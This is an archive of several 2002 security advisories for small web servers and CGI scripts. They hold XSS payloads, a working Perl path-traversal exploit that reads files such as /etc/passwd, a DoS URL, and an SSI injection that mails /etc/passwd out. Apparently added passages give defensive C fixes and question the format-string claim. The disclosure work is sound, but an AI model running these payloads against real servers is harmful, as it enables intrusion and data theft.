XSS bug in Monkey (0.5.0) HTTP server

2002-09-30 Thread DownBload



   [ Illegal Instruction Labs Advisory ]
[-]
Advisory name: XSS bug in Monkey (0.5.0) HTTP server
Advisory number: 14
Application: Monkey (0.5.0) HTTP server
Application author: Eduardo Silva (EdsipeR)
Author e-mail: [EMAIL PROTECTED]
Monkey Project: http://monkeyd.sourceforge.net
Date: 29.09.2002
Impact: XSS code execution
Tested on: Debian 2.1 (2.0.36 kernel)
Discovered by: DownBload
Mail me @: [EMAIL PROTECTED]




==[ Overview 
Monkey is a very simple and fast HTTP server (daemon). 




==[ Problems
1.) Monkey is vulnerable to XSS.
---cut here---
www.victim.com/<script>alert('IIL_0wnZ_YoU!!!');</script>
---cut here---

2.) There is also an XSS bug in the test2.pl CGI script (example script) which 
comes with Monkey 0.5.0.
---cut here---
www.victim.com/cgi-bin/test2.pl?<script>alert('IIL_0wnZ_YoU!!!');</script>
---cut here---




==[ Greetz 
Greetz goes to #hr.hackers, #ii-labs and #linux irc.carnet.hr. 
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, 
Fr1c, phreax, StYx, harlequin, LekaMan, Astral and www.active-security.org 
(NetZero & Paradox).
I'm very sorry if I forgot someone.



IIL Advisory: Reverse traversal vulnerability in Monkey (0.1.4) HTTP server

2002-09-25 Thread DownBload




[ Illegal Instruction Labs Advisory ]
[-]
Advisory name: Reverse traversal vulnerability in Monkey (0.1.4) HTTP server
Advisory number: 12
Application: Monkey (0.1.4) HTTP server
Application author: Eduardo Silva (EdsipeR)
Author e-mail: [EMAIL PROTECTED]
Monkey Project: http://monkeyd.sourceforge.net
Date: 06.09.2002
Impact: Attacker can read files out of SERVER_ROOT directory
Tested on: Debian 2.1 (2.0.36 kernel)
Discovered by: DownBload
Mail me @: [EMAIL PROTECTED]




==[ Overview 
Monkey is a very simple and fast HTTP server (daemon). 
Monkey supports the HEAD & GET methods, multiple connections and 100 MIME types.




==[ Problem 
Monkey doesn't check the HTTP request for the "../" string, and because of that 
an attacker can view any file outside the SERVER_ROOT directory which Monkey can 
read (if Monkey is running under the root account, the attacker can read any file 
on that machine). 
There is still one thing which makes the attack a little more complicated:

- src/method.c
...
if((strcmp(aux_request,"/"))==0 || aux_request[1]=='.' ) {
    snprintf(filename,255,"%s",SERVER_ROOT);
}
...

Translated to (poor:) English: 
If our request is "/" or the second char of our request is ".", then the path 
will be set to SERVER_ROOT, and in that case we can't get out of the SERVER_ROOT 
directory. 

The previous if will prevent a simple reverse traversal attack like this one:
---cut here---
GET /../../../../../../../../../etc/passwd HTTP/1.0
---cut here---

But it can't prevent this reverse traversal attack:
---cut here---
GET //../../../../../../../../../etc/passwd HTTP/1.0
---cut here---
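The aux_request[1]=='.' test inspects a single character, which is exactly why the "//../" form slips past it while "/../" is caught. The added example below (not Monkey's code) normalises the whole request path lexically before anything touches the filesystem, so both forms are rejected; the root "/var/www" is a constructed stand-in for SERVER_ROOT.

```c
#include <stdio.h>
#include <string.h>

/* Resolve an HTTP request path to a file under `root`. Runs of '/' are
 * collapsed (so "//../" gets the same treatment as "/../"), "." segments
 * are dropped and ".." pops the previous one. Returns 1 and fills `out`
 * when the path stays inside root, 0 when a ".." would climb above it or
 * the result does not fit. Lexical only: percent-decode the request first. */
int request_to_path(const char *root, const char *req, char *out, size_t outlen)
{
    const char *segs[64];
    size_t lens[64];
    int depth = 0;
    const char *end = strchr(req, '?');        /* query string is not part of the path */
    const char *p = req;
    if (!end) end = req + strlen(req);
    while (p < end) {
        while (p < end && *p == '/') p++;      /* "//" collapses to "/" */
        if (p >= end) break;
        const char *start = p;
        while (p < end && *p != '/') p++;
        size_t len = (size_t)(p - start);
        if (len == 1 && start[0] == '.')
            continue;                          /* "." keeps the current directory */
        if (len == 2 && start[0] == '.' && start[1] == '.') {
            if (depth == 0) return 0;          /* would escape SERVER_ROOT */
            depth--;
            continue;
        }
        if (depth == 64) return 0;             /* unreasonably deep request */
        segs[depth] = start; lens[depth] = len; depth++;
    }
    int used = snprintf(out, outlen, "%s", root);
    for (int i = 0; i < depth; i++) {
        if (used < 0 || (size_t)used >= outlen) return 0;
        used += snprintf(out + used, outlen - (size_t)used, "/%.*s", (int)lens[i], segs[i]);
    }
    return used >= 0 && (size_t)used < outlen;
}

/* "/var/www" is a constructed stand-in for SERVER_ROOT; `last_path` holds
 * the resolved file name after a request is accepted. */
char last_path[256];
int allowed(const char *req)
{
    return request_to_path("/var/www", req, last_path, sizeof last_path);
}
```

The check is purely lexical: it must run on the percent-decoded request and does not account for symlinks under the root.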




==[ Exploit

---cut here---
#!/usr/bin/perl
#
# (0 day;) Monkey-0.1.4 reverse traversal exploit 
#
# Usage: 
#       perl monkey.pl hostname httpport file
#
#       hostname - target host 
#       httpport - port on which HTTP daemon is listening
#       file     - file which you wanna get
#
# Example:
#       perl monkey.pl www.ii-labs.org 80 /etc/passwd
#   
# by DownBload [EMAIL PROTECTED]
# Illegal Instruction Labs 
#
use IO::Socket;

 sub sock () {
   $SOCK = IO::Socket::INET->new (PeerAddr => $host, 
                                  PeerPort => $port,
                                  Proto    => "tcp") 
   || die "[ ERROR: Can't connect to $host!!! ]\n\n";
 }

 sub banner() {
  print "[--]\n";
  print "[   Monkey-0.1.4 reverse traversal exploit ]\n";
  print "[by DownBload downbload\@hotmail.com  ]\n";
  print "[ Illegal Instruction Labs ]\n";
  print "[--]\n";
 }

 if ($#ARGV != 2)
 {
  banner();
  print "[ Usage:   ]\n";
  print "[perl monkey.pl hostname httpport file   ]\n";
  print "[--]\n";
  exit(0);
 } 

 $host = $ARGV[0];
 $port = $ARGV[1];
 $file = $ARGV[2];

 banner();
 print "[ Connecting to $host... ]\n";
 sock();
 print "[ Sending probe... ]\n";
 print $SOCK "HEAD / HTTP/1.0\n\n";
 while ($a = <$SOCK>) { $line = $line . $a; } 
 if ($line =~ /Monkey/) { print "[ Monkey HTTP server found, continuing... ]\n"; }
 else { die "[ SORRY: That's not Monkey HTTP server :( ]\n\n"; }
 close ($SOCK);

 print "[ Connecting to $host... ]\n";
 sock();
 print "[ Sending GET request... ]\n";
 print $SOCK "GET //../../../../../../../../../$file HTTP/1.0\n\n";
 print "[ Waiting for response... ]\n\n";
 while ($line = <$SOCK>) { print $line; }
 close ($SOCK);
---cut here---




==[ Greetz 
Greetz goes to #hr.hackers, #ii-labs and #linux irc.carnet.hr. 
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, 
Fr1c, phreax, StYx, harlequin, LekaMan, Astral and www.active-security.org 
(NetZero & Paradox). I'm very sorry if I forgot someone.



IIL Advisory: Format String bug in Null Webmail (0.6.3)

2002-09-25 Thread DownBload




 [ Illegal Instruction Labs Advisory ]
[-]
Advisory name: Format String bug in Null Webmail (0.6.3)
Advisory number: 7
Application: Null Webmail 0.6.3
Author: Dan Cahill
E-mail: [EMAIL PROTECTED]
Homepage: http://http://www.nulllogic.com/webmail/
Date: 1.07.2002
Impact: I don't know (yet)
Tested on: nowhere
Discovered by: DownBload
Mail me @: [EMAIL PROTECTED]




==[ Overview

Null Webmail is a CGI interface to SMTP & POP3 servers (you can read and 
send mail with your browser). It is written in C. You can find Null 
Webmail on SourceForge.




==[ Problem 

Null Webmail has a format string bug in logdata() and wmprintf(), but
logdata() is commented out inside /* */, so logdata() isn't interesting to us. 

Here comes the buggy code:

---[ wmserver.c
...
/*
void logdata(const char *format, ...)  /* <-- NOT INTERESTING */
{
    char logbuffer[1024];
    char file[200];
    va_list ap;
    FILE *fp;

#ifdef WIN32
    snprintf(file, sizeof(file)-1, "C:\\webmail.log");
#else
    snprintf(file, sizeof(file)-1, "/tmp/webmail.log");
#endif
    fp=fopen(file, "a");
    if (fp!=NULL) {
        va_start(ap, format);
        vsnprintf(logbuffer, sizeof(logbuffer)-1, format, ap);
        va_end(ap);
        fprintf(fp, "%s", logbuffer);
        fclose(fp);
    }
}
*/


int wmprintf(const char *format, ...)  /* <-- INTERESTING FUNCTION */
{
    char buffer[1024];
    va_list ap;

    va_start(ap, format);
    vsnprintf(buffer, sizeof(buffer)-1, format, ap); // <- INTERESTING 
    va_end(ap); 
    send(wmsocket, buffer, strlen(buffer), 0);
//  logdata ( "%s", buffer);
    return 0;
}
...

---[ wmprintf() calls 

...
wmprintf("USER %s\r\n", wmusername);
...
wmprintf("PASS %s\r\n", wmpassword);
...
wmprintf("MAIL From: %s\r\n", ptemp);  
...
wmprintf("RCPT To: %s\r\n", msgaddr);
...
wmprintf("From: %s\r\n", wmaddress);
wmprintf("To: %s\r\n", msgto);
...
wmprintf("Subject: %s\r\n", msgsubject);
...
etc.

Here we have a few wmprintf() calls, and I think that we can put our 
'NASTY %sTRING' in all of those variables :).
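In each of the calls listed above the format string is a literal and the user-controlled value travels as the %s argument, so vsnprintf() renders it as data; a format string bug needs attacker text to reach the format parameter itself (a call of the shape wmprintf(buffer) with buffer holding user input). The added example below is not Null Webmail's code: it mirrors wmprintf() into a buffer and adds the check an auditor would apply, counting the conversions a format consumes and refusing a format that does not match its argument count or contains %n.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Number of arguments a printf-style format consumes: one per conversion,
 * one more for each '*' width or precision, none for "%%". Returns -1 for
 * a dangling '%' or a "%n" (which writes to memory). */
int count_conversions(const char *fmt)
{
    int n = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        for (p++; *p && strchr("-+ #0123456789.*hlLqjzt", *p); p++)
            if (*p == '*') n++;
        if (!*p || *p == 'n') return -1;
        n++;
    }
    return n;
}

/* Mirror of wmprintf() that renders into `out` instead of send()ing to
 * wmsocket. It refuses (returns -1) unless the format consumes exactly
 * `nargs` arguments, so a literal such as "USER %s\r\n" with one argument
 * passes while user data handed over as the format does not. Otherwise
 * it returns what vsnprintf() returned. */
int wm_format(char *out, size_t outlen, int nargs, const char *format, ...)
{
    if (count_conversions(format) != nargs)
        return -1;
    va_list ap;
    va_start(ap, format);
    int len = vsnprintf(out, outlen, format, ap);  /* same call wmprintf() makes */
    va_end(ap);
    return len;
}

/* The "USER %s\r\n" line from the page rendered with a caller-supplied
 * username: the username is data, so "%s%s%n" in it is never interpreted. */
const char *user_line(const char *wmusername)
{
    static char buf[64];
    return wm_format(buf, sizeof buf, 1, "USER %s\r\n", wmusername) < 0 ? NULL : buf;
}
```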




==[ Example

Can't test this bug!!!
If I'm wrong about this format string bug in Null Webmail, I'm very sorry.




==[ Greetz 

Greetz goes to #hr.hackers & #linux irc.carnet.hr. 
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, fi, Sunnis, Fr1c,
phreax, harlequin, LekaMan, Astral and www.active-security.org (NetZero & 
Paradox).



IIL Advisory: Vulnerabilities in acWEB HTTP server

2002-09-25 Thread DownBload




[ Illegal Instruction Labs Advisory ]
[-]
Advisory name: Vulnerabilities in acWEB HTTP server
Advisory number: 13
Application: acWEB HTTP server
Author e-mail: [EMAIL PROTECTED]
Homepage: somewhere on sourceforge
Date: 10.09.2002
Impact: DoS, XSS, etc.
Tested on: Windows 98
Discovered by: DownBload
Mail me @: [EMAIL PROTECTED]




==[ Overview 

Sourceforge: acWEB is an OpenSource replacement for MS IIS and other 
proprietary WEB servers for Windows. Unlike IIS, acWEB is not affected by 
viruses like CodeRed, Nimda, etc :).

/ME says: acWEB is a simple HTTP server for Windows. It is perfect for tiny 
companies and for home use.




==[ Problem(s)  

===[ Remote DoS
The first vulnerability which I discovered in the acWEB HTTP server was a remote DoS.
It is possible to crash acWEB (and Windows too) with a simple HTTP request:
---cut here---
http://www.victim.com/com2.bat 
---cut here---


===[ XSS a.k.a CSS bug
XSS code execution:
---cut here---
http://www.victim.com/%db<script>alert('Illegal%20Instruction%20Labs%200wnz%20YoU!!!');</script>/
---cut here---


===[ Fake file download
---cut here---
http://www.victim.com/|%5chacked.txt%00
---cut here---

When this request is sent to the acWEB HTTP server, acWEB will return:
---
HTTP/1.0 200 OK
Content-Length: 0
Connection: Close
Content-Type: application/octet-stream
Server: Eserv/3.x

---
That is fuqn weird, because the file 'hacked.txt' doesn't exist. The acWEB HTTP 
server will send us an empty 'hacked.txt' file to download. 




==[ Exploit

This can be exploited with a browser, so I won't write an exploit for this... or 
maybe one day :).




==[ Greetz 

Greetz goes to #hr.hackers, #ii-labs and #linux irc.carnet.hr. 
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, 
Fr1c, phreax, LekaMan, StYx, harlequin, Astral and www.active-security.org 
(NetZero & Paradox). I'm very sorry if I forgot someone.



SSI CSS execution in MakeBook 2.2

2002-06-12 Thread DownBload



  [ DownBload Security Research Lab Advisory ]
[-]
Advisory name: SSI & CSS execution in MakeBook 2.2
Advisory number: 5  
Application: MakeBook 2.2 (CGI script)
Application author: Kristina Pfaff-Harris 
Source: http://www.tesol.net/scriptmail.html
Date: 12.6.2002 
Impact: remote user can execute shell commands & cross site scripting 
Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
Discovered by: DownBload
Mail me @: [EMAIL PROTECTED]




--[ Overview 

...MakeBook v2.2 is a simple program which can be used as a guestbook,
an ongoing writing project where each person adds to an ongoing story,
a comment board, or even a way to let people add comments to many
individual pages.  It allows a user to enter their name, email address,
and some text which will then be added to the bookfile.  Originally
intended for use in writing a continuing story or journal, where
different students could add to the story as they went along, it has
evolved into a more flexible system which allows the owner to choose
how the book entries should appear, and even what pages they appear 
on...


   

--[ Problem 

Our dear Kristina wrote an advanced CGI guestbook, in Perl of course. 
It works fine, but trouble comes when you look for the security measures in the 
program. When you want to sign the guestbook, you have to write your name,
email address, and some text. The script does remove 'some' special chars in 
$text, but it doesn't replace special chars in $name at all, and because
of that it is possible to enter, instead of a name, some SSI (Server
Side Includes) or CSS (Cross Site Scripting) code, which then gets executed.
'Buggy' code:
...
$name  = $data{Name};
$email = $data{Email};
$text  = $data{Text};
$text  =~ s/</&lt;/g;
$text  =~ s/>/&gt;/g;
...




--[ Examples

SSI attack
~~
Name: <!--#exec cmd="/bin/mail [EMAIL PROTECTED] < /etc/passwd"-->
E-mail: [EMAIL PROTECTED]
Text: I hacked you, my kung-fu is the best... ;)

CSS attack
~~
Name: <img src="javascript:alert('HACKED BY DOWNBLOAD');">
E-mail: [EMAIL PROTECTED]
Text: I hacked you, my kung-fu is the best... ;)

I won't give you more examples, use your own imagination :).
BTW: the SSI attack depends on the web server, because some web servers
come with, and some without, support for SSI.




--[ Solution 

The solution for this bug would be to filter special characters from user
input. For now, you can use this:

...
$name  = $data{Name};
$name  =~ s/</&lt;/g;
$name  =~ s/>/&gt;/g;

$email = $data{Email};
$email =~ s/</&lt;/g;
$email =~ s/>/&gt;/g;

$text  = $data{Text};
$text  =~ s/</&lt;/g;
$text  =~ s/>/&gt;/g;
...
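The fix above rewrites only '<' and '>', which is enough to stop both payloads from the Examples section, since neither "<!--#exec" nor "<img" survives it. The added example below (not MakeBook's code, and written in C rather than Perl) generalises that to the full set of HTML metacharacters, so a field stays inert even inside an attribute such as a mailto link; the entry markup it emits is a constructed stand-in for MakeBook's own format.

```c
#include <stdio.h>
#include <string.h>

/* Escape one user-supplied field for inclusion in HTML. Besides the '<' and
 * '>' the page's fix replaces, '&' and both quote characters are escaped so a
 * value placed inside an attribute cannot break out of it. Returns the escaped
 * length (without the terminator) or -1 if `out` (outlen >= 1) is too small;
 * `out` is NUL-terminated either way. */
int html_escape(const char *in, char *out, size_t outlen)
{
    size_t used = 0;
    for (const char *p = in; *p; p++) {
        char one[2] = { *p, '\0' };
        const char *rep;
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;   /* neutralises "<!--#exec" and "<img" alike */
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t rl = strlen(rep);
        if (used + rl >= outlen) { out[used] = '\0'; return -1; }
        memcpy(out + used, rep, rl);
        used += rl;
    }
    out[used] = '\0';
    return (int)used;
}

/* Build the guestbook line for one entry (constructed markup, not MakeBook's)
 * with every field escaped before it is placed in the page. NULL on overflow. */
const char *guestbook_entry(const char *name, const char *email, const char *text)
{
    static char line[1024];
    char n[256], e[256], t[512];
    if (html_escape(name, n, sizeof n) < 0 || html_escape(email, e, sizeof e) < 0 ||
        html_escape(text, t, sizeof t) < 0)
        return NULL;
    snprintf(line, sizeof line, "<p><a href=\"mailto:%s\">%s</a>: %s</p>", e, n, t);
    return line;
}
```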




--[ Greetz

Greetz goes to #hr.hackers irc.carnet.hr.
Special greetz goes to Kristina Pfaff-Harris (ladies first), BoyScout, 
h4z4rd, fi, Fr1c, harlequin and www.active-security.org.